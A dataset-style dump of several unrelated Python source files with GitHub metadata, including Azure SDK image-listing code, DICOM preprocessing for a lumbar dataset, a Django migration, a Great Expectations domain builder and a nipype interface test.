request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ImageListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list_by_resource_group.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images"
}
@distributed_trace
def list(self, **kwargs: Any) -> Iterable["_models.Image"]:
"""Gets the list of Images in the subscription. Use nextLink property in the response to get the
next page of Images. Do this till nextLink is null to fetch all the Images.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Image or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.compute.v2022_03_01.models.Image]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
cls: ClsType[_models.ImageListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ImageListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list.metadata = {"url": "/subscriptions/{subscriptionId}/providers/Microsoft.Compute/images"}
| [
"noreply@github.com"
] | kurtzeborn.noreply@github.com |
a5c5dcbc94612c0992dd51b396788cba593b0e91 | b224c7413b7e6a1cb78dad60b4899674fefe8269 | /openforce_financial_report/report/__init__.py | f25291a28701b525b54a4b167f885ea54eb1abb4 | [] | no_license | alessandrocamilli/7-openforce-addons | 2ee00b712538a8eb433d0ce0c63cd12a861548e6 | 78fc164679b690bcf84866987266838de134bc2f | refs/heads/master | 2016-08-03T11:58:12.730337 | 2014-07-03T10:29:56 | 2014-07-03T10:29:56 | 21,004,298 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,036 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Alessandro Camilli (a.camilli@yahoo.it)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import partners_due_register
import common_partner_reports
import common_reports
import webkit_parser_header_fix
| [
"alessandrocamilli@openforce.it"
] | alessandrocamilli@openforce.it |
50a2ef5128dd7ed1fe459863cad3a6691fb09054 | 7ae754f51aaf2e6e559b925980c35fe795808537 | /02_分支/hm_07_火车站安检.py | 49c870c4d693840399ef573b305e8d8426bed2bc | [] | no_license | xiaohema233/PythonStart | be113d9359734d17eeb22b0584cf240a128fed3c | 44f98fc6c50f2c85b72ee029ec99d3099459f370 | refs/heads/master | 2022-05-15T19:33:22.363721 | 2022-05-09T06:28:05 | 2022-05-09T06:28:05 | 241,621,051 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 785 | py | # 定义布尔型变量 has_ticket 表示是否有车票
has_ticket = True
# 定义整型变量 knife_length 表示刀的长度,单位:厘米
knife_length = 30
# 首先检查是否有车票,如果有,才允许进行 安检
if has_ticket:
print("车票检查通过,准备开始安检")
# 安检时,需要检查刀的长度,判断是否超过 20 厘米
if knife_length > 20:
# 如果超过 20 厘米,提示刀的长度,不允许上车
print("您携带的刀太长了,有 %d 公分长!" % knife_length)
print("不允许上车")
# 如果不超过 20 厘米,安检通过
else:
print("安检已经通过,祝您旅途愉快!")
# 如果没有车票,不允许进门
else:
print("大哥,请先买票")
| [
"33052287+xiaohema233@users.noreply.github.com"
] | 33052287+xiaohema233@users.noreply.github.com |
44132d5bd3147c83d6a97cb746893c629d905bfa | 9c880db9912c35a73469f728245de78459763ce4 | /ProjectCode/DataPreprocess.py | de80744293fdabddd08e68bd8803a6da43957549 | [] | no_license | Lizi2hua/Project-111 | 3a17e396230c76bf47dd8209e801fe5edd079004 | 57dc7e331b5bfa860226e67c6f45de682720df98 | refs/heads/master | 2022-10-20T16:36:47.322765 | 2020-07-14T14:42:03 | 2020-07-14T14:42:03 | 277,501,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,166 | py | #将所有的数据处理函数都包含到此文件下
import SimpleITK as sitk
import os
import json
import glob
import SimpleITK as sitk
import pandas as pd
import matplotlib.pyplot as plt
# dcm数据处理函数
def dicom_metainfo(dicm_path, list_tag):
'''
获取dicom的元数据信息
:param dicm_path: dicom文件地址
:param list_tag: 标记名称列表,比如['0008|0018',]
:return:
'''
reader = sitk.ImageFileReader()
reader.LoadPrivateTagsOn()
reader.SetFileName(dicm_path)
reader.ReadImageInformation()
return [reader.GetMetaData(t) for t in list_tag]
def dicom2array(dcm_path):
'''
读取dicom文件并把其转化为灰度图(np.array)
https://simpleitk.readthedocs.io/en/master/link_DicomConvert_docs.html
:param dcm_path: dicom文件
:return:
'''
image_file_reader = sitk.ImageFileReader()
image_file_reader.SetImageIO('GDCMImageIO')
image_file_reader.SetFileName(dcm_path)
image_file_reader.ReadImageInformation()
image = image_file_reader.Execute()
if image.GetNumberOfComponentsPerPixel() == 1:
image = sitk.RescaleIntensity(image, 0, 255)
if image_file_reader.GetMetaData('0028|0004').strip() == 'MONOCHROME1':
image = sitk.InvertIntensity(image, maximum=255)
image = sitk.Cast(image, sitk.sitkUInt8)
img_x = sitk.GetArrayFromImage(image)[0]
return img_x
# json文件处理函数
def get_info(train_path,json_path):
annotation_info = pd.DataFrame(columns=('studyUid','seriesUid','instanceUid','annotation'))
json_df = pd.read_json(json_path)
for idx in json_df.index:
studyUid = json_df.loc[idx,"studyUid"]
seriesUid = json_df.loc[idx,"data"][0]['seriesUid']
instanceUid = json_df.loc[idx,"data"][0]['instanceUid']
annotation = json_df.loc[idx,"data"][0]['annotation']
row = pd.Series({'studyUid':studyUid,'seriesUid':seriesUid,'instanceUid':instanceUid,'annotation':annotation})
annotation_info = annotation_info.append(row,ignore_index=True)
dcm_paths = glob.glob(os.path.join(train_path,"**","**.dcm"))
tag_list = ['0020|000d','0020|000e','0008|0018']
dcm_info = pd.DataFrame(columns=('dcmPath','studyUid','seriesUid','instanceUid'))
for dcm_path in dcm_paths:
try:
studyUid,seriesUid,instanceUid = dicom_metainfo(dcm_path,tag_list)
row = pd.Series({'dcmPath':dcm_path,'studyUid':studyUid,'seriesUid':seriesUid,'instanceUid':instanceUid })
dcm_info = dcm_info.append(row,ignore_index=True)
except:
continue
result = pd.merge(annotation_info,dcm_info,on=['studyUid','seriesUid','instanceUid'])
result = result.set_index('dcmPath')['annotation'] #返回图片路径与标注信息
return result
# 得到数据(array类型)和标签的函数
def DataLabelGenerator(DATA_PATH,JSON_PATH,idx):
result=get_info(DATA_PATH,JSON_PATH)
#将读图转换为array
img_dir=result.index[idx] #第idx的图片路径
img_arr=dicom2array(img_dir)
#获取标注信息
tags=result[idx]
annoation=tags[0]['data']['point']
#坐标
coord=[]
#脊椎ID
id=[]
#腰间盘
disc=[]
#腰椎
vertebra=[]
for j in range(len(annoation)):
coord_list=annoation[j]['coord']
coord.append(coord_list)
id_name=annoation[j]['tag']['identification']
id.append(id_name)
name=annoation[j]['tag']
vertebra_label=name.get('vertebra')
vertebra.append(vertebra_label)
disc_label=name.get('disc')
disc.append(disc_label)
return img_arr,coord,id,disc,vertebra
# 一下代码是测试,也可以做模板
# DATA_PATH= r"C:\project\lumbar\Project-111\dataset\train_train51"
# JSON_PATH= r"C:\project\lumbar\Project-111\dataset\train_train51/lumbar_train51_annotation.json"
# idx=5
# img_arr,coord,id,disc,vertebra=DataLabelGenerator(DATA_PATH,JSON_PATH,idx)
# print(coord)
# print(img_arr)
# plt.title("{}\'s img ".format(idx))
# for j in coord:
# x,y=j
# plt.scatter(x,y,c='r',s=3)
# plt.imshow(img_arr,cmap='gray')
# plt.show()
| [
"1050100964@qq.com"
] | 1050100964@qq.com |
a9cf8b7863b31cbd9969909edaa8c0ecef6230ee | bfd04e41f0b5b236ef937eb3922a105d00d25ce0 | /db/campaigns/migrations/0001_initial.py | 11a233e848f4766a19dd5444b69249caf5e3acf5 | [
"MIT"
] | permissive | cega/try.wq.io | 5c9dac3f428b2a92c63096f0cb882f264f684b9f | fcb12d5e26a05f6a653f0cf63e668ea1a2f088c2 | refs/heads/master | 2021-06-09T20:41:25.402542 | 2016-11-29T19:41:59 | 2016-11-29T19:41:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,079 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-23 15:59
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.WQ_REPORTSTATUS_MODEL),
migrations.swappable_dependency(settings.WQ_SITE_MODEL),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Campaign',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('slug', models.SlugField()),
('name', models.CharField(max_length=255)),
('icon', models.ImageField(upload_to='campaigns')),
('description', models.TextField()),
],
),
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
],
options={
'ordering': ('-date', 'campaign', 'site'),
},
),
migrations.CreateModel(
name='EventResult',
fields=[
('id', models.PositiveIntegerField(primary_key=True, serialize=False)),
('event_date', models.DateField()),
('result_value_numeric', models.FloatField(blank=True, null=True)),
('result_value_text', models.TextField(blank=True, null=True)),
('result_empty', models.BooleanField(default=False)),
('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.WQ_EVENT_MODEL)),
('event_campaign', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='campaigns.Campaign')),
('event_site', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.WQ_SITE_MODEL)),
],
options={
'db_table': 'wq_eventresult',
'abstract': False,
},
),
migrations.CreateModel(
name='Parameter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, db_index=True, max_length=255)),
('slug', models.CharField(blank=True, max_length=255)),
('is_numeric', models.BooleanField(default=False)),
('units', models.CharField(blank=True, max_length=50, null=True)),
('description', models.TextField()),
('campaign', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='parameters', to='campaigns.Campaign')),
],
options={
'ordering': ['pk'],
},
),
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('entered', models.DateTimeField(blank=True)),
('photo', models.ImageField(blank=True, null=True, upload_to='reports')),
('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='report_set', to=settings.WQ_EVENT_MODEL)),
('status', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.WQ_REPORTSTATUS_MODEL)),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
'ordering': ('-entered',),
},
),
]
| [
"andrew@wq.io"
] | andrew@wq.io |
d9b9389944f741e45759c518f06c672459fe46f7 | a281d09ed91914b134028c3a9f11f0beb69a9089 | /great_expectations/rule_based_profiler/domain_builder/column_pair_domain_builder.py | e7290588875208769d5627b986abc51a6ca0c953 | [
"Apache-2.0"
] | permissive | CarstenFrommhold/great_expectations | 4e67bbf43d21bc414f56d576704259a4eca283a5 | 23d61c5ed26689d6ff9cec647cc35712ad744559 | refs/heads/develop | 2023-01-08T10:01:12.074165 | 2022-11-29T18:50:18 | 2022-11-29T18:50:18 | 311,708,429 | 0 | 0 | Apache-2.0 | 2020-11-10T15:52:05 | 2020-11-10T15:52:04 | null | UTF-8 | Python | false | false | 3,949 | py | from __future__ import annotations
from typing import TYPE_CHECKING, Dict, List, Optional, Union
import great_expectations.exceptions as ge_exceptions
from great_expectations.core.metric_domain_types import MetricDomainTypes
from great_expectations.rule_based_profiler.domain import (
INFERRED_SEMANTIC_TYPE_KEY,
Domain,
SemanticDomainTypes,
)
from great_expectations.rule_based_profiler.domain_builder import ColumnDomainBuilder
from great_expectations.rule_based_profiler.parameter_container import (
ParameterContainer,
)
if TYPE_CHECKING:
from great_expectations.data_context.data_context.abstract_data_context import (
AbstractDataContext,
)
from great_expectations.validator.validator import Validator
class ColumnPairDomainBuilder(ColumnDomainBuilder):
"""
This DomainBuilder uses relative tolerance of specified map metric to identify domains.
"""
def __init__(
self,
include_column_names: Optional[Union[str, Optional[List[str]]]] = None,
data_context: Optional[AbstractDataContext] = None,
) -> None:
"""
Args:
include_column_names: Explicitly specified exactly two desired columns
data_context: AbstractDataContext associated with this DomainBuilder
"""
super().__init__(
include_column_names=include_column_names,
exclude_column_names=None,
include_column_name_suffixes=None,
exclude_column_name_suffixes=None,
semantic_type_filter_module_name=None,
semantic_type_filter_class_name=None,
include_semantic_types=None,
exclude_semantic_types=None,
data_context=data_context,
)
@property
def domain_type(self) -> MetricDomainTypes:
return MetricDomainTypes.COLUMN_PAIR
def _get_domains(
self,
rule_name: str,
variables: Optional[ParameterContainer] = None,
) -> List[Domain]:
"""Return domains matching the specified tolerance limits.
Args:
rule_name: name of Rule object, for which "Domain" objects are obtained.
variables: Optional variables to substitute when evaluating.
Returns:
List of domains that match the desired tolerance limits.
"""
batch_ids: List[str] = self.get_batch_ids(variables=variables)
validator: Validator = self.get_validator(variables=variables)
effective_column_names: List[str] = self.get_effective_column_names(
batch_ids=batch_ids,
validator=validator,
variables=variables,
)
if not (effective_column_names and (len(effective_column_names) == 2)):
raise ge_exceptions.ProfilerExecutionError(
message=f"""Error: Columns specified for {self.__class__.__name__} in sorted order must correspond to \
"column_A" and "column_B" (in this exact order).
"""
)
effective_column_names = sorted(effective_column_names)
domain_kwargs: Dict[str, str] = dict(
zip(
[
"column_A",
"column_B",
],
effective_column_names,
)
)
column_name: str
semantic_types_by_column_name: Dict[str, SemanticDomainTypes] = {
column_name: self.semantic_type_filter.table_column_name_to_inferred_semantic_domain_type_map[
column_name
]
for column_name in effective_column_names
}
domains: List[Domain] = [
Domain(
domain_type=self.domain_type,
domain_kwargs=domain_kwargs,
details={
INFERRED_SEMANTIC_TYPE_KEY: semantic_types_by_column_name,
},
rule_name=rule_name,
),
]
return domains
| [
"noreply@github.com"
] | CarstenFrommhold.noreply@github.com |
2a947cb9b779beaefbc64505b7502fe3f4a97d72 | 38346ccf93e0c0d49a378b2532fe215669018829 | /nipype/interfaces/mrtrix/tests/test_auto_SphericallyDeconvolutedStreamlineTrack.py | 447ba546dd431fb73ff3b3ce3dbc8a4164d3feb4 | [
"BSD-3-Clause"
] | permissive | swederik/nipype | de509c2605bc83448240c7c3c68ee8d220d48ef3 | 872720a6fc00b00e029fb67742deedee524b2a9f | refs/heads/master | 2020-12-25T10:08:44.268742 | 2014-05-22T14:05:58 | 2014-05-22T14:05:58 | 1,421,176 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,106 | py | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from nipype.testing import assert_equal
from nipype.interfaces.mrtrix.tracking import SphericallyDeconvolutedStreamlineTrack
def test_SphericallyDeconvolutedStreamlineTrack_inputs():
input_map = dict(args=dict(argstr='%s',
),
cutoff_value=dict(argstr='-cutoff %s',
units='NA',
),
desired_number_of_tracks=dict(argstr='-number %d',
),
do_not_precompute=dict(argstr='-noprecomputed',
),
environ=dict(nohash=True,
usedefault=True,
),
exclude_file=dict(argstr='-exclude %s',
xor=['exclude_file', 'exclude_spec'],
),
exclude_spec=dict(argstr='-exclude %s',
position=2,
sep=',',
units='mm',
xor=['exclude_file', 'exclude_spec'],
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
in_file=dict(argstr='%s',
mandatory=True,
position=-2,
),
include_file=dict(argstr='-include %s',
xor=['include_file', 'include_spec'],
),
include_spec=dict(argstr='-include %s',
position=2,
sep=',',
units='mm',
xor=['include_file', 'include_spec'],
),
initial_cutoff_value=dict(argstr='-initcutoff %s',
units='NA',
),
initial_direction=dict(argstr='-initdirection %s',
units='voxels',
),
inputmodel=dict(argstr='%s',
position=-3,
usedefault=True,
),
mask_file=dict(argstr='-mask %s',
xor=['mask_file', 'mask_spec'],
),
mask_spec=dict(argstr='-mask %s',
position=2,
sep=',',
units='mm',
xor=['mask_file', 'mask_spec'],
),
maximum_number_of_tracks=dict(argstr='-maxnum %d',
),
maximum_tract_length=dict(argstr='-length %s',
units='mm',
),
minimum_radius_of_curvature=dict(argstr='-curvature %s',
units='mm',
),
minimum_tract_length=dict(argstr='-minlength %s',
units='mm',
),
no_mask_interpolation=dict(argstr='-nomaskinterp',
),
out_file=dict(argstr='%s',
name_source=['in_file'],
name_template='%s_tracked.tck',
output_name='tracked.tck',
position=-1,
),
seed_file=dict(argstr='-seed %s',
xor=['seed_file', 'seed_spec'],
),
seed_spec=dict(argstr='-seed %s',
position=2,
sep=',',
units='mm',
xor=['seed_file', 'seed_spec'],
),
step_size=dict(argstr='-step %s',
units='mm',
),
stop=dict(argstr='-stop',
),
terminal_output=dict(mandatory=True,
nohash=True,
),
unidirectional=dict(argstr='-unidirectional',
),
)
inputs = SphericallyDeconvolutedStreamlineTrack.input_spec()
for key, metadata in input_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_SphericallyDeconvolutedStreamlineTrack_outputs():
output_map = dict(tracked=dict(),
)
outputs = SphericallyDeconvolutedStreamlineTrack.output_spec()
for key, metadata in output_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| [
"satra@mit.edu"
] | satra@mit.edu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.